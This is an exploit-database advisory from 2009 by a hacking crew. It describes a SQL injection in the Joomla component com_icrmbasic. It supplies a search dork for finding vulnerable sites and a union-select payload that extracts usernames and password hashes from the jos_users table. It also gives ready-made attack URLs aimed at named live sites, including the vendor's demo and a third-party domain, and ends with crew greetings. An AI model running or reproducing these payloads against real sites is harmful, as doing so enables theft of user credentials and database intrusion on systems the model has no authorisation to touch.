[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla IRCm Basic SQL Injection
# Published : 2009-09-28
# Author : kaMtiEz
# Previous Title : FlatPress 0.804 - 0.812.1 local file inclusion vulnerability
# Next Title : Klonet E-Commerce products.php SQL Injection


################################################################################################
## Joomla Component com_ircmbasic SQL injection vulnerability 	                              ##
## Author : kaMtiEz (kamzcrew@gmail.com)						      ##
## Homepage : http://www.indonesiancoder.com    	     				      ##
## Date : September 27, 2009 								      ##
################################################################################################
# Hello My Name Is :                                                                          ##
#  __               _____   __  ._____________                                                ##
# |  | _______     /     _/  |_|___   _____/_______                                         ##
# |  |/ /__     /   /     __  ||    __)____   /                                         ##
# |    <  / __ _/    Y      | |  ||        /    /                                          ##
# |__|_ (____  /____|__  /__| |__/_______  /_____                                          ##
#      /     /         /                /      / -=- INDONESIAN CODER -=- KILL-9 CREW -=-##
################################################################################################

[ Software Information ]

[+] Vendor : http://www.isygen.com/
[+] Download : http://www.isygen.com/index.php?option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=481
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_icrmbasic"
[+] Location : INDONESIA

################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_icrmbasic&p1=m6&p3=[INDONESIANCODER]&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

[ Exploit ]

-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--

[ Vendor Demo Using com_icrmbasicdemo ]

http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,password),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483

[ The Real com_icrmbasic Demo ]

http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER, TEAM KILL-9 CREW, KIRIK CREW, ServerIsDown, AntiSecurity.org
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Jack-, Yadoy666, Pathloader, abah_benu, VycOd,
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz, och3_an3h
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s, rendy, devil_nongkrong and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^